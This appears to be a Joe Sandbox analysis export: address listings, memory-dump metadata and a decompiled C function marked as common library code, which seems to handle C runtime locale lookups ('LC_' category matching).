0x01352194
0x01352196
0x01352199
0x0135219a
0x0135219d
0x013521a6
0x013521a9
0x013521d4
0x013521d7
0x013521dd
0x013521e0
0x013521e0
0x013521e2
0x013521e3
0x013521ea
0x013521f0
0x0135221b
0x0135221e
0x01352224
0x01352224
0x01352227
0x01352227
0x01352229
0x0135222a
0x01352231
0x01352237
0x01352262
0x01352265
0x0135226b
0x0135226b
0x0135226e
0x0135226e
0x01352270
0x01352271
0x01352275
0x01352277
0x0135227a
0x0135227d
0x01352280
0x01352285
0x01352290
0x01352296
0x01352296
0x0135229f
0x013522a2
0x00000000
0x013522ab
0x013522b3
0x013522dd
0x013522dd
0x013522df
0x013522e2
0x013522e2
0x013522e5
0x013522e8
0x013522f2
0x013522f5
0x013522fd
0x01352300
0x01352303
0x01352304
0x0135230a
0x00000000
0x0135230c
0x0135230f
0x01352312
0x00000000
0x0135231b
0x01352324
0x01352351
0x01352351
0x01352353
0x01352356
0x01352356
0x01352359
0x0135235c
0x01352368
0x0135236e
0x01352371
0x01352372
0x01352378
0x00000000
0x0135237a
0x0135237d
0x01352380
0x00000000
0x01352389
0x01352392
0x013523bf
0x013523bf
0x013523c1
0x013523c4
0x013523c4
0x013523c7
0x013523ca
0x013523d6
0x013523dc
0x013523df
0x013523e0
0x013523e6
0x00000000
0x013523e8
0x013523eb
0x013523ee
0x00000000
0x013523f7
0x01352400
0x0135242d
0x0135242d
0x0135242f
0x01352432
0x01352432
0x01352435
0x01352438
0x01352444
0x0135244a
0x0135244d
0x0135244e
0x01352454
0x00000000
0x01352456
0x01352459
0x0135245c
0x00000000
0x01352465
0x0135246e
0x0135249b
0x0135249b
0x0135249d
0x013524a0
0x013524a0
0x013524a3
0x013524a6
0x013524b2
0x013524b8
0x013524bb
0x013524bc
0x013524c2
0x00000000
0x013524c4
0x013524c7
0x013524c6
0x013524c6
0x013524d0
0x013524d3
0x01352504
0x01352507
0x0135250d
0x01352510
0x01352510
0x01352513
0x01352516
0x01352522
0x01352528
0x01352527
0x01352527
0x01352531
0x01352562
0x01352565
0x0135256b
0x0135256e
0x0135256e
0x01352571
0x01352574
0x01352580
0x01352586
0x01352585
0x01352585
0x0135258f
0x013525c0
0x013525c3
0x013525c9
0x013525cc
0x013525cc
0x013525cf
0x013525d2
0x013525de
0x013525e4
0x013525e3
0x013525e3
0x013525ed
0x0135261a
0x0135261d
0x01352623
0x01352626
0x01352626
0x01352629
0x0135262c
0x01352638
0x01352639
0x0135263f
0x01352645
0x01352652
0x00000000
0x01352647
0x01352647
0x0135264a
0x00000000
0x0135264a
0x013525ef
0x013525f9
0x0135260e
0x01352613
0x01352618
0x00000000
0x00000000
0x00000000
0x00000000
0x01352618
0x01352591
0x0135259b
0x013525b0
0x013525b5
0x013525ba
0x00000000
0x00000000
0x00000000
0x00000000
0x013525ba
0x01352533
0x0135253d
0x01352552
0x01352557
0x0135255c
0x00000000
0x00000000
0x00000000
0x00000000
0x0135255c
0x013524d5
0x013524df
0x013524f4
0x013524f9
0x013524fe
0x00000000
0x00000000
0x00000000
0x00000000
0x013524fe
0x013524d3
0x01352470
0x0135247d
0x0135248b
0x01352490
0x01352495
0x00000000
0x00000000
0x00000000
0x00000000
0x01352495
0x00000000
0x0135246e
0x01352464
0x00000000
0x01352464
0x01352402
0x0135240f
0x0135241d
0x01352422
0x01352427
0x00000000
0x00000000
0x00000000
0x00000000
0x01352427
0x00000000
0x01352400
0x013523f6
0x00000000
0x013523f6
0x01352394
0x013523a1
0x013523af
0x013523b4
0x013523b9
0x00000000
0x00000000
0x00000000
0x00000000
0x013523b9
0x00000000
0x01352392
0x01352388
0x00000000
0x01352388
0x01352326
0x01352333
0x01352341
0x01352346
0x0135234b
0x00000000
0x00000000
0x00000000
0x00000000
0x0135234b
0x00000000
0x01352324
0x0135231a
0x00000000
0x0135231a
0x013522b5
0x013522bf
0x013522cd
0x013522d2
0x013522d7
0x00000000
0x00000000
0x00000000
0x00000000
0x013522d7
0x00000000
0x013522b3
0x013522aa
0x00000000
0x01352239
0x0135223f
0x01352252
0x01352257
0x0135225c
0x00000000
0x00000000
0x00000000
0x00000000
0x0135225c
0x013521f2
0x013521f8
0x0135220b
0x01352210
0x01352215
0x00000000
0x00000000
0x00000000
0x00000000
0x01352215
0x013521ab
0x013521b1
0x013521c4
0x013521c9
0x013521ce
0x00000000
0x00000000
0x00000000
0x00000000
0x013521ce
0x01351fb4
0x01351fb5
0x01351fba
0x01351fc0
0x01352655
0x01352659
0x0135265e
0x0135265e
0x0135266b
0x01351fc6
0x01351fc9
0x01351fce
0x01351fd1
0x01351fd4
0x01351fd7
0x01351fda
0x00000000
0x01351fda
0x01351fc0
0x00000000
0x01351fb2

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: df1e006896783462e176ce9dab9edfdf4b57364b05705571f3288edf14f9e6f4
Instruction ID: 90543903a46cc856db8144a182bd1f9e8c1e98aafd27d4cc0c99898aa5a93725
Opcode Fuzzy Hash: df1e006896783462e176ce9dab9edfdf4b57364b05705571f3288edf14f9e6f4
Instruction Fuzzy Hash: A1327A74A0020ADFCF59CF9CC994EBFBBB5EF44608F184168DD45A7306D632AA46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013543F7, Relevance: 7.7, APIs: 5, Instructions: 186
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E013543F7(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v60;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				short _v454;
				intOrPtr _v456;
				signed int _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v512;
				char _v536;
				intOrPtr _v540;
				signed int _v544;
				intOrPtr _v548;
				signed int _v560;
				char _v708;
				signed int _v712;
				short _v714;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int _v732;
				intOrPtr _v736;
				signed int* _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v824;
				char _v1252;
				char _v1268;
				intOrPtr _v1284;
				signed int _v1288;
				intOrPtr _v1324;
				signed int _v1336;
				void* __ebp;
				signed int _t249;
				signed int _t251;
				void* _t254;
				signed int _t257;
				signed int _t259;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t272;
				signed int _t274;
				void* _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				signed int _t281;
				signed int _t284;
				signed int _t291;
				signed int _t294;
				signed int _t295;
				intOrPtr _t296;
				signed int _t299;
				signed int _t301;
				signed int _t302;
				signed int _t305;
				signed int _t307;
				signed int _t310;
				signed int _t311;
				signed int _t313;
				signed int _t331;
				signed int _t333;
				signed int _t335;
				signed int _t339;
				void* _t341;
				signed int _t343;
				void* _t344;
				intOrPtr _t345;
				signed int _t350;
				signed int _t351;
				intOrPtr* _t356;
				signed int _t370;
				signed int _t372;
				signed int _t374;
				intOrPtr* _t375;
				signed int _t377;
				void* _t382;
				intOrPtr* _t387;
				intOrPtr* _t390;
				void* _t393;
				signed int _t394;
				intOrPtr* _t397;
				intOrPtr* _t398;
				char* _t405;
				intOrPtr _t409;
				intOrPtr* _t410;
				signed int _t412;
				signed int _t417;
				signed int _t418;
				intOrPtr* _t422;
				intOrPtr* _t423;
				signed int _t432;
				short _t433;
				void* _t434;
				void* _t436;
				signed int _t437;
				signed int _t439;
				intOrPtr _t440;
				signed int _t443;
				intOrPtr _t444;
				signed int _t446;
				signed int _t449;
				intOrPtr _t455;
				signed int _t456;
				void* _t457;
				signed int _t458;
				signed int _t459;
				void* _t461;
				signed int _t463;
				signed int _t465;
				signed int _t468;
				signed int* _t469;
				short _t470;
				signed int _t472;
				signed int _t473;
				void* _t475;
				void* _t476;
				signed int _t477;
				void* _t478;
				void* _t479;
				signed int _t480;
				void* _t482;
				void* _t483;
				signed int _t495;

				_t431 = __edx;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t249 = E013576ED(0x6a6); // executed
				_t370 = _t249;
				_t250 = 0;
				_pop(_t382);
				if(_t370 == 0) {
					L20:
					return _t250;
				} else {
					_push(__edi);
					 *_t370 = 1;
					_t439 = _t370 + 4;
					_t455 = _a4;
					 *_t439 = 0;
					_t251 = _t455 + 0x30;
					_push( *_t251);
					_v16 = _t251;
					_push(0x137c338);
					_push( *0x137c274);
					E01354333(_t370, _t382, __edx, _t439, _t455, _t439, 0x351, 3);
					_t476 = _t475 + 0x18;
					_v8 = 0x137c274;
					while(1) {
						L2:
						_t254 = E0135C7FD(_t439, 0x351, 0x137c334);
						_t477 = _t476 + 0xc;
						if(_t254 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t422 = _t8;
							_t350 =  *_v16;
							_v16 = _t422;
							_t423 =  *_t422;
							_v20 = _t423;
							goto L4;
						}
						while(1) {
							L4:
							_t431 =  *_t350;
							if(_t431 !=  *_t423) {
								break;
							}
							if(_t431 == 0) {
								L8:
								_t351 = 0;
							} else {
								_t431 =  *((intOrPtr*)(_t350 + 2));
								if(_t431 !=  *((intOrPtr*)(_t423 + 2))) {
									break;
								} else {
									_t350 = _t350 + 4;
									_t423 = _t423 + 4;
									if(_t431 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							_push(_v20);
							_push(0x137c338);
							asm("sbb eax, eax");
							_v12 = _v12 &  !( ~_t351);
							_t356 = _v8 + 0xc;
							_v8 = _t356;
							_push( *_t356);
							E01354333(_t370, _t423, _t431, _t439, _t455, _t439, 0x351, 3);
							_t476 = _t477 + 0x18;
							if(_v8 < 0x137c2a4) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E01355C8F(_t370);
									_t446 = _t439 | 0xffffffff;
									__eflags =  *(_t455 + 0x28);
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											E01355C8F( *(_t455 + 0x28));
										}
									}
									__eflags =  *(_t455 + 0x24);
									if( *(_t455 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t446 == 1;
										if(_t446 == 1) {
											E01355C8F( *(_t455 + 0x24));
										}
									}
									 *(_t455 + 0x24) = 0;
									 *(_t455 + 0x1c) = 0;
									 *(_t455 + 0x28) = 0;
									 *((intOrPtr*)(_t455 + 0x20)) = 0;
									_t250 =  *((intOrPtr*)(_t455 + 0x40));
								} else {
									_t449 = _t439 | 0xffffffff;
									_t495 =  *(_t455 + 0x28);
									if(_t495 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t495 == 0) {
											E01355C8F( *(_t455 + 0x28));
										}
									}
									if( *(_t455 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										if(_t449 == 1) {
											E01355C8F( *(_t455 + 0x24));
										}
									}
									 *(_t455 + 0x24) =  *(_t455 + 0x24) & 0x00000000;
									_t250 = _t370 + 4;
									 *(_t455 + 0x1c) =  *(_t455 + 0x1c) & 0x00000000;
									 *(_t455 + 0x28) = _t370;
									 *((intOrPtr*)(_t455 + 0x20)) = _t250;
								}
								goto L20;
							}
							goto L136;
						}
						asm("sbb eax, eax");
						_t351 = _t350 | 0x00000001;
						__eflags = _t351;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E013496E7();
					asm("int3");
					_t472 = _t477;
					_t478 = _t477 - 0x1d0;
					_t257 =  *0x13a4018; // 0x39cca9f6
					_v60 = _t257 ^ _t472;
					_t259 = _v44;
					_push(_t370);
					_push(_t455);
					_t456 = _v40;
					_push(_t439);
					_t440 = _v48;
					_v512 = _t440;
					__eflags = _t259;
					if(_t259 == 0) {
						_v460 = 1;
						_v472 = 0;
						_t372 = 0;
						_v452 = 0;
						__eflags = _t456;
						if(__eflags == 0) {
							L80:
							E013543F7(_t372, _t431, _t440, _t456, __eflags, _t440); // executed
							goto L81;
						} else {
							__eflags =  *_t456 - 0x4c;
							if( *_t456 != 0x4c) {
								L60:
								_t266 = E01353F6D(_t372, _t431, _t440, _t456, _t456,  &_v276, 0x83,  &_v448, 0x55,  &_v468); // executed
								_t479 = _t478 + 0x18;
								__eflags = _t266;
								if(_t266 != 0) {
									__eflags = 0;
									_t432 = _t440 + 0x20;
									_t458 = 0;
									_v452 = _t432;
									do {
										__eflags = _t458;
										if(_t458 == 0) {
											L75:
											_t267 = _v460;
										} else {
											_t387 =  *_t432;
											_t268 =  &_v276;
											while(1) {
												__eflags =  *_t268 -  *_t387;
												_t440 = _v464;
												if( *_t268 !=  *_t387) {
													break;
												}
												__eflags =  *_t268;
												if( *_t268 == 0) {
													L68:
													_t269 = 0;
												} else {
													_t433 =  *((intOrPtr*)(_t268 + 2));
													__eflags = _t433 -  *((intOrPtr*)(_t387 + 2));
													_v454 = _t433;
													_t432 = _v452;
													if(_t433 !=  *((intOrPtr*)(_t387 + 2))) {
														break;
													} else {
														_t268 = _t268 + 4;
														_t387 = _t387 + 4;
														__eflags = _v454;
														if(_v454 != 0) {
															continue;
														} else {
															goto L68;
														}
													}
												}
												L70:
												__eflags = _t269;
												if(_t269 == 0) {
													_t372 = _t372 + 1;
													__eflags = _t372;
													goto L75;
												} else {
													_t270 =  &_v276;
													_push(_t270);
													_push(_t458);
													_push(_t440);
													L84();
													_t432 = _v452;
													_t479 = _t479 + 0xc;
													__eflags = _t270;
													if(_t270 == 0) {
														_t267 = 0;
														_v460 = 0;
													} else {
														_t372 = _t372 + 1;
														goto L75;
													}
												}
												goto L76;
											}
											asm("sbb eax, eax");
											_t269 = _t268 | 0x00000001;
											__eflags = 0;
											goto L70;
										}
										L76:
										_t458 = _t458 + 1;
										_t432 = _t432 + 0x10;
										_v452 = _t432;
										__eflags = _t458 - 5;
									} while (_t458 <= 5);
									__eflags = _t267;
									if(__eflags != 0) {
										goto L80;
									} else {
										__eflags = _t372;
										if(__eflags != 0) {
											goto L80;
										} else {
										}
									}
								}
								goto L81;
							} else {
								__eflags =  *(_t456 + 2) - 0x43;
								if( *(_t456 + 2) != 0x43) {
									goto L60;
								} else {
									__eflags =  *((short*)(_t456 + 4)) - 0x5f;
									if( *((short*)(_t456 + 4)) != 0x5f) {
										goto L60;
									} else {
										while(1) {
											_t272 = E0135D7A0(_t456, 0x137c32c);
											_t374 = _t272;
											_v468 = _t374;
											_pop(_t389);
											__eflags = _t374;
											if(_t374 == 0) {
												break;
											}
											_t274 = _t272 - _t456;
											__eflags = _t274;
											_v460 = _t274 >> 1;
											if(_t274 == 0) {
												break;
											} else {
												_t276 = 0x3b;
												__eflags =  *_t374 - _t276;
												if( *_t374 == _t276) {
													break;
												} else {
													_t443 = _v460;
													_t375 = 0x137c274;
													_v456 = 1;
													do {
														_t277 = E01355668( *_t375, _t456, _t443);
														_t478 = _t478 + 0xc;
														__eflags = _t277;
														if(_t277 != 0) {
															goto L46;
														} else {
															_t390 =  *_t375;
															_t434 = _t390 + 2;
															do {
																_t345 =  *_t390;
																_t390 = _t390 + 2;
																__eflags = _t345 - _v472;
															} while (_t345 != _v472);
															_t389 = _t390 - _t434 >> 1;
															__eflags = _t443 - _t390 - _t434 >> 1;
															if(_t443 != _t390 - _t434 >> 1) {
																goto L46;
															}
														}
														break;
														L46:
														_v456 = _v456 + 1;
														_t375 = _t375 + 0xc;
														__eflags = _t375 - 0x137c2a4;
													} while (_t375 <= 0x137c2a4);
													_t372 = _v468 + 2;
													_t278 = E0135D747(_t389, _t372, 0x137c334);
													_t440 = _v464;
													_t459 = _t278;
													_pop(_t393);
													__eflags = _t459;
													if(_t459 != 0) {
														L49:
														__eflags = _v456 - 5;
														if(_v456 > 5) {
															_t394 = _v452;
															goto L55;
														} else {
															_push(_t459);
															_t281 = E0135555C( &_v276, 0x83, _t372);
															_t480 = _t478 + 0x10;
															__eflags = _t281;
															if(_t281 != 0) {
																L83:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E013496E7();
																asm("int3");
																_push(_t472);
																_t473 = _t480;
																_t284 =  *0x13a4018; // 0x39cca9f6
																_v560 = _t284 ^ _t473;
																_push(_t372);
																_t377 = _v544;
																_push(_t459);
																_push(_t440);
																_t444 = _v548;
																_v1288 = _t377;
																_v1284 = E013559E0(_t393, _t431) + 0x278;
																_t291 = E01353F6D(_t377, _t431, _t444, _v540, _v540,  &_v824, 0x83,  &_v1252, 0x55,  &_v1268);
																_t482 = _t480 - 0x2e4 + 0x18;
																__eflags = _t291;
																if(_t291 == 0) {
																	L124:
																	__eflags = 0;
																	goto L125;
																} else {
																	_t103 = _t377 + 2; // 0x2
																	_t463 = _t103 << 4;
																	__eflags = _t463;
																	_t294 =  &_v280;
																	_v720 = _t463;
																	_t397 =  *((intOrPtr*)(_t463 + _t444));
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t294 -  *_t397;
																		_t465 = _v720;
																		if( *_t294 !=  *_t397) {
																			break;
																		}
																		__eflags =  *_t294;
																		if( *_t294 == 0) {
																			L91:
																			_t295 = _v712;
																		} else {
																			_t470 =  *((intOrPtr*)(_t294 + 2));
																			__eflags = _t470 -  *((intOrPtr*)(_t397 + 2));
																			_v714 = _t470;
																			_t465 = _v720;
																			if(_t470 !=  *((intOrPtr*)(_t397 + 2))) {
																				break;
																			} else {
																				_t294 = _t294 + 4;
																				_t397 = _t397 + 4;
																				__eflags = _v714;
																				if(_v714 != 0) {
																					continue;
																				} else {
																					goto L91;
																				}
																			}
																		}
																		L93:
																		__eflags = _t295;
																		if(_t295 != 0) {
																			_t398 =  &_v280;
																			_t436 = _t398 + 2;
																			do {
																				_t296 =  *_t398;
																				_t398 = _t398 + 2;
																				__eflags = _t296 - _v712;
																			} while (_t296 != _v712);
																			_v716 = (_t398 - _t436 >> 1) + 1;
																			_t299 = E013576ED(4 + ((_t398 - _t436 >> 1) + 1) * 2);
																			_v732 = _t299;
																			__eflags = _t299;
																			if(_t299 == 0) {
																				goto L124;
																			} else {
																				_v728 =  *((intOrPtr*)(_t465 + _t444));
																				_v748 =  *(_t444 + 0xa0 + _t377 * 4);
																				_v752 =  *(_t444 + 8);
																				_t405 =  &_v280;
																				_v736 = _t299 + 4;
																				_t301 = E01352808(_t299 + 4, _v716, _t405);
																				_t483 = _t482 + 0xc;
																				__eflags = _t301;
																				if(_t301 != 0) {
																					_t302 = _v712;
																					_push(_t302);
																					_push(_t302);
																					_push(_t302);
																					_push(_t302);
																					_push(_t302);
																					E013496E7();
																					asm("int3");
																					_push(_t473);
																					_push(_t405);
																					_v1336 = _v1336 & 0x00000000;
																					_t305 = E0135628F(_v1324, 0x20001004,  &_v1336, 2);
																					__eflags = _t305;
																					if(_t305 == 0) {
																						L134:
																						return 0xfde9;
																					}
																					_t307 = _v20;
																					__eflags = _t307;
																					if(_t307 == 0) {
																						goto L134;
																					}
																					return _t307;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t465 + _t444)) = _v736;
																					if(_v280 != 0x43) {
																						L102:
																						_t310 = E01353C8A(_t377, _t444,  &_v708);
																						_t437 = _v712;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L102;
																						} else {
																							_t437 = _v712;
																							_t310 = _t437;
																						}
																					}
																					 *(_t444 + 0xa0 + _t377 * 4) = _t310;
																					__eflags = _t377 - 2;
																					if(_t377 != 2) {
																						__eflags = _t377 - 1;
																						if(_t377 != 1) {
																							__eflags = _t377 - 5;
																							if(_t377 == 5) {
																								 *((intOrPtr*)(_t444 + 0x14)) = _v724;
																							}
																						} else {
																							 *((intOrPtr*)(_t444 + 0x10)) = _v724;
																						}
																					} else {
																						_t469 = _v740;
																						 *(_t444 + 8) = _v724;
																						_v716 = _t469[8];
																						_t417 = _t469[9];
																						_v724 = _t417;
																						while(1) {
																							__eflags =  *(_t444 + 8) -  *(_t469 + _t437 * 8);
																							if( *(_t444 + 8) ==  *(_t469 + _t437 * 8)) {
																								break;
																							}
																							_t339 =  *(_t469 + _t437 * 8);
																							_t417 =  *(_t469 + 4 + _t437 * 8);
																							 *(_t469 + _t437 * 8) = _v716;
																							 *(_t469 + 4 + _t437 * 8) = _v724;
																							_t437 = _t437 + 1;
																							_t377 = _v744;
																							_v716 = _t339;
																							_v724 = _t417;
																							__eflags = _t437 - 5;
																							if(_t437 < 5) {
																								continue;
																							} else {
																							}
																							L110:
																							__eflags = _t437 - 5;
																							if(__eflags == 0) {
																								_t331 = E0135877D(_t377, _t437, _t444, __eflags, _v712, 1, 0x137c1e8, 0x7f,  &_v536,  *(_t444 + 8), 1);
																								_t483 = _t483 + 0x1c;
																								__eflags = _t331;
																								if(_t331 == 0) {
																									_t418 = _v712;
																								} else {
																									_t333 = _v712;
																									do {
																										 *(_t473 + _t333 * 2 - 0x20c) =  *(_t473 + _t333 * 2 - 0x20c) & 0x000001ff;
																										_t333 = _t333 + 1;
																										__eflags = _t333 - 0x7f;
																									} while (_t333 < 0x7f);
																									_t335 = E013469C4( &_v536,  *0x13a41f0, 0xfe);
																									_t483 = _t483 + 0xc;
																									__eflags = _t335;
																									_t418 = 0 | _t335 == 0x00000000;
																								}
																								_t469[1] = _t418;
																								 *_t469 =  *(_t444 + 8);
																							}
																							 *(_t444 + 0x18) = _t469[1];
																							goto L122;
																						}
																						__eflags = _t437;
																						if(_t437 != 0) {
																							 *_t469 =  *(_t469 + _t437 * 8);
																							_t469[1] =  *(_t469 + 4 + _t437 * 8);
																							 *(_t469 + _t437 * 8) = _v716;
																							 *(_t469 + 4 + _t437 * 8) = _t417;
																						}
																						goto L110;
																					}
																					L122:
																					_t311 = _t377 * 0xc;
																					_t204 = _t311 + 0x137c270; // 0x132f829
																					 *0x1374358(_t444);
																					_t313 =  *((intOrPtr*)( *_t204))();
																					_t409 = _v728;
																					__eflags = _t313;
																					if(_t313 == 0) {
																						__eflags = _t409 - 0x13a42c8;
																						if(_t409 != 0x13a42c8) {
																							_t468 = _t377 + _t377;
																							__eflags = _t468;
																							asm("lock xadd [eax], ecx");
																							if(_t468 != 0) {
																								goto L129;
																							} else {
																								E01355C8F( *((intOrPtr*)(_t444 + 0x28 + _t468 * 8)));
																								E01355C8F( *((intOrPtr*)(_t444 + 0x24 + _t468 * 8)));
																								E01355C8F( *(_t444 + 0xa0 + _t377 * 4));
																								_t412 = _v712;
																								 *(_v720 + _t444) = _t412;
																								 *(_t444 + 0xa0 + _t377 * 4) = _t412;
																							}
																						}
																						_t410 = _v732;
																						 *_t410 = 1;
																						 *((intOrPtr*)(_t444 + 0x28 + (_t377 + _t377) * 8)) = _t410;
																					} else {
																						 *((intOrPtr*)(_v720 + _t444)) = _t409;
																						E01355C8F( *(_t444 + 0xa0 + _t377 * 4));
																						 *(_t444 + 0xa0 + _t377 * 4) = _v748;
																						E01355C8F(_v732);
																						 *(_t444 + 8) = _v752;
																						goto L124;
																					}
																					goto L125;
																				}
																			}
																		} else {
																			L125:
																			_pop(_t461);
																			__eflags = _v16 ^ _t473;
																			return E0132EA79(_v16 ^ _t473, _t461);
																		}
																		goto L136;
																	}
																	asm("sbb eax, eax");
																	_t295 = _t294 | 0x00000001;
																	__eflags = _t295;
																	goto L93;
																}
															} else {
																_t341 = _t459 + _t459;
																__eflags = _t341 - 0x106;
																if(_t341 >= 0x106) {
																	E0132EC0C();
																	goto L83;
																} else {
																	 *((short*)(_t472 + _t341 - 0x10c)) = 0;
																	_t343 =  &_v276;
																	_push(_t343);
																	_push(_v456);
																	_push(_t440);
																	L84();
																	_t394 = _v452;
																	_t478 = _t480 + 0xc;
																	__eflags = _t343;
																	if(_t343 != 0) {
																		_t394 = _t394 + 1;
																		_v452 = _t394;
																	}
																	L55:
																	_t456 = _t372 + _t459 * 2;
																	_t279 =  *_t456 & 0x0000ffff;
																	_t431 = _t279;
																	__eflags = _t279;
																	if(_t279 != 0) {
																		_t456 = _t456 + 2;
																		__eflags = _t456;
																		_t431 =  *_t456 & 0x0000ffff;
																	}
																	__eflags = _t431;
																	if(_t431 != 0) {
																		continue;
																	} else {
																		__eflags = _t394;
																		if(__eflags != 0) {
																			goto L80;
																		} else {
																			break;
																		}
																		goto L81;
																	}
																}
															}
														}
													} else {
														_t344 = 0x3b;
														__eflags =  *_t372 - _t344;
														if( *_t372 != _t344) {
															break;
														} else {
															goto L49;
														}
													}
												}
											}
											goto L136;
										}
										goto L81;
									}
								}
							}
						}
					} else {
						__eflags = _t456;
						if(_t456 != 0) {
							_push(_t456);
							_push(_t259);
							_push(_t440);
							L84();
						}
						L81:
						_pop(_t457);
						__eflags = _v12 ^ _t472;
						return E0132EA79(_v12 ^ _t472, _t457);
					}
				}
				L136:
			}

0x013543f7
0x013543ff
0x01354400
0x01354409
0x0135440c
0x01354411
0x01354413
0x01354415
0x01354418
0x01354535
0x01354538
0x0135441e
0x0135441e
0x0135441f
0x01354421
0x01354424
0x01354427
0x0135442a
0x0135442d
0x0135442f
0x01354432
0x01354437
0x01354445
0x0135444f
0x01354452
0x01354455
0x01354455
0x01354460
0x01354465
0x0135446a
0x00000000
0x01354470
0x01354473
0x01354473
0x01354476
0x01354478
0x0135447b
0x0135447d
0x0135447d
0x0135447d
0x01354480
0x01354480
0x01354480
0x01354486
0x00000000
0x00000000
0x0135448b
0x013544a2
0x013544a2
0x0135448d
0x0135448d
0x01354495
0x00000000
0x01354497
0x01354497
0x0135449a
0x013544a0
0x00000000
0x00000000
0x00000000
0x00000000
0x013544a0
0x01354495
0x013544ab
0x013544ab
0x013544b0
0x013544b5
0x013544b9
0x013544c5
0x013544c8
0x013544cb
0x013544d5
0x013544dd
0x013544e5
0x00000000
0x013544eb
0x013544ef
0x0135453a
0x01354543
0x01354546
0x01354548
0x0135454c
0x01354550
0x01354555
0x0135455a
0x01354550
0x0135455e
0x01354560
0x01354562
0x01354566
0x01354567
0x0135456c
0x01354571
0x01354567
0x01354574
0x01354577
0x0135457a
0x0135457d
0x01354580
0x013544f1
0x013544f4
0x013544f7
0x013544f9
0x013544fd
0x01354501
0x01354506
0x0135450b
0x01354501
0x01354511
0x01354513
0x01354518
0x0135451d
0x01354522
0x01354518
0x01354523
0x01354527
0x0135452a
0x0135452e
0x01354531
0x01354531
0x00000000
0x01354534
0x00000000
0x013544e5
0x013544a6
0x013544a8
0x013544a8
0x00000000
0x013544a8
0x01354587
0x01354588
0x01354589
0x0135458a
0x0135458b
0x0135458c
0x01354591
0x01354595
0x01354597
0x0135459d
0x013545a4
0x013545a7
0x013545aa
0x013545ab
0x013545ac
0x013545af
0x013545b0
0x013545b3
0x013545b9
0x013545bb
0x013545e0
0x013545ea
0x013545f0
0x013545f2
0x013545f8
0x013545fa
0x0135485a
0x0135485b
0x00000000
0x01354600
0x01354600
0x01354604
0x01354772
0x0135478f
0x01354794
0x01354797
0x01354799
0x0135479f
0x013547a1
0x013547a4
0x013547a6
0x013547ac
0x013547ac
0x013547ae
0x01354835
0x01354835
0x013547b4
0x013547b4
0x013547b6
0x013547bc
0x013547bf
0x013547c2
0x013547c8
0x00000000
0x00000000
0x013547ca
0x013547ce
0x013547f7
0x013547f9
0x013547d0
0x013547d0
0x013547d4
0x013547d8
0x013547df
0x013547e5
0x00000000
0x013547e7
0x013547e7
0x013547ea
0x013547ed
0x013547f5
0x00000000
0x00000000
0x00000000
0x00000000
0x013547f5
0x013547e5
0x01354804
0x01354804
0x01354806
0x01354834
0x01354834
0x00000000
0x01354808
0x01354808
0x0135480e
0x0135480f
0x01354810
0x01354811
0x01354816
0x0135481c
0x0135481f
0x01354821
0x0135482a
0x0135482c
0x01354823
0x01354823
0x00000000
0x01354824
0x01354821
0x00000000
0x01354806
0x013547fd
0x013547ff
0x01354802
0x00000000
0x01354802
0x0135483b
0x0135483b
0x0135483c
0x0135483f
0x01354845
0x01354845
0x0135484e
0x01354850
0x00000000
0x01354852
0x01354852
0x01354854
0x00000000
0x01354856
0x01354856
0x01354854
0x01354850
0x00000000
0x0135460a
0x0135460a
0x0135460f
0x00000000
0x01354615
0x01354615
0x0135461a
0x00000000
0x01354620
0x01354620
0x01354626
0x0135462b
0x0135462d
0x01354634
0x01354635
0x01354637
0x00000000
0x00000000
0x0135463d
0x0135463d
0x01354641
0x01354647
0x00000000
0x0135464d
0x0135464f
0x01354650
0x01354653
0x00000000
0x01354659
0x01354659
0x0135465f
0x01354664
0x0135466e
0x01354672
0x01354677
0x0135467a
0x0135467c
0x00000000
0x0135467e
0x0135467e
0x01354680
0x01354683
0x01354683
0x01354686
0x01354689
0x01354689
0x01354694
0x01354696
0x01354698
0x00000000
0x00000000
0x01354698
0x00000000
0x0135469a
0x0135469a
0x013546a0
0x013546a3
0x013546a3
0x013546b1
0x013546ba
0x013546bf
0x013546c5
0x013546c8
0x013546c9
0x013546cb
0x013546d9
0x013546d9
